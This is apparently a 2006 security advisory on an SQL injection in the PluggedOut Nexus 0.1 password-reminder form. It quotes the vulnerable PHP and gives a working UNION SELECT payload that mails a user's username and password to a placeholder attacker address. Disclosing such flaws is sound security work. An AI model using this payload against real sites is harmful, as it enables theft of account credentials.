pluggedoutSQL.txt

2006-03-03T00:00:00
ID PACKETSTORM:44331
Type packetstorm
Reporter Hamid Ebadi
Modified 2006-03-03T00:00:00

Description

                                        
                                            `PluggedOut Nexus SQL injection  
Nexus is an open source script you can run on your web  
server to give you a community based website  
where people can register, search each others  
interests, and communicate with one another either  
through a private messaging system, or via chat  
requests and forums.  
Project : PluggedOut Nexus  
Version : 0.1  
Author : Jonathan Beckett  
Home : http://www.pluggedout.com  
  
Credit:  
The information has been provided by Hamid Ebadi .  
( Hamid Network Security Team): admin[AT]hamid[o]ir  
The original article can be found at:  
http://hamid.ir/security/  
  
Vulnerable Systems:PluggedOut Nexus 0.1  
  
http://localhost/Nexus/forgotten_password.php  
  
in this address If you fill the private email address  
that you used while creating your account into the  
form , the server will send you an email to that  
address with your login details  
Input passed to the "email" parameter in  
"forgotten_password.php" isn't properly sanitised  
before being used in a SQL query. This can be  
exploited to manipulate SQL queries by injecting  
arbitrary SQL code.  
  
test:  
in E-Mail Address form enter ' and press Send Request   
you will redirect to  
http://localhost/Nexus/site_problem.php and see :  
  
Problem with Nexus website  
A problem has occurred with the Nexus website - this  
was not your fault, and the administrators probably  
already know about it.  
  
  
Vulnerable Code: The following lines in  
"forgotten_password.php" :  
---------------------------~=[Vulnerable  
Code]=~---------------------------  
if ($_POST["submit"]!=""){  
$con = db_connect();  
$sql = "SELECT cUsername,cPassword,cEMailPrivate FROM  
nexus_users WHERE  
cEMailPrivate='".$_POST["email"]."'";  
$result = mysql_query($sql,$con);  
if ($result!=false){  
if (mysql_num_rows($result)>0){  
$row = mysql_fetch_array($result);  
$from = $site_admin_email;  
$to = $row["cEMailPrivate"];  
$subject = "Reminder Username/Password from  
".$site_long_name."";  
$body = "This email has been sent following a  
request for a reminder username/password in the  
".$site_long_name." website.\n\n"  
."Your account details are as follows;\n"  
." Username : ".$row["cUsername"]."\n"  
." Password : ".$row["cPassword"]."\n\n"  
."If you did not request this reminder message,  
please contact the ".$site_long_name." administrator  
(".$admin_email.")\n";  
  
send_email($from,$to,$subject,$body);  
  
---------------------------~=[/Vulnerable  
Code]=~---------------------------  
  
  
exploit:  
  
insert this code in E-Mail Address form  
(http://localhost/Nexus/forgotten_password.php) :  
hamidnetworksecurityteam' union select  
cUsername,cPassword,'ATTACKER@EMAIL.ADDRESS' from  
nexus_users WHERE nUserId=1 and '1'='1  
  
and ATTACKER@EMAIL.ADDRESS recieve email contain  
username & password for userID=1 .   
  
Signature  
  
  
  
__________________________________________________  
Do You Yahoo!?  
Tired of spam? Yahoo! Mail has the best spam protection around   
http://mail.yahoo.com   
`